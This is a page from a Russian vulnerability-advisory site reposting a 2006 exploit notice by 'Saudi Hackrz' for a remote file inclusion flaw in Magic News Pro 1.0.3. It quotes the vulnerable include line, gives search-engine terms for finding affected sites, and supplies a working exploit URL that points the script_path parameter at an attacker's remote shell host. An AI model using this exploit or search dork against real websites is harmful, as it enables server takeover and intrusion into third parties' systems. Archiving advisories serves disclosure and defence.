Информационная безопасность
[RU] switch to
English Version



Дополнительная информация

  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl)

  [SA21883] emuCMS "query" and "page" Cross-Site Scripting Vulnerabilities

  phpQuiz v0.01 design and coding byJule Slootbeek (pagename) Remote File Inclusion

  Mambo com_serverstat Component <=0.4.4 Remote File Include Vulnerability

  KnowledgeBuilder.v2.
2.PHP.NULL-WDYL  Remote File Inclusion

From:Saudi Hackrz <Saudi.Unix_(at)_Hotmail.com>
Date:14 сентября 2006 г.
Subject:Magic News Pro => 1.0.3 (script_path) Remote File Inclusion Exploit

#====================================================================
#Magic News Pro => 1.0.3 (script_path) Remote File Inclusion Exploit
#====================================================================
#
#Critical Level : Dangerous
#
#By Saudi Hackrz
#
#http://www.reamdaysoft.com
#http://www.reamdaysoft.com/magic-news-pro/overview.html
#=================================================================
#
#Script Name: Magic News Pro v 1.0.3
#Script :) << $$
#http://www.9q9q.net/up3/index.php?f=jMicDawzV
#
#=================================================================
#Bug in : news_page.php
#        include_once($script_path."/config.php");
#
#in <<<<  news/scripts/news_page.php
#Serche : "js-news.php?nr=" or "mgic news pro" or "js-news.php"
#=================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/news/scripts/news_page.php?script_path=http://SHELLURL.
COM?
#
#===============================================================================

#Discoverd By : Saudi Hackrz
#
#Conatact : Saudi.unix[at]hotmail.com
#
#GreetZ :SnIpEr_Sa , KiNg18 , LeCoPrA And All My Frind :)
#www.S3hr.com . www.elite-team.cc/vb .www.3asfh.net . www.lezr.com/vb .www.xp10.com
===============================================================================#

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород

 
 



Rating@Mail.ru
test server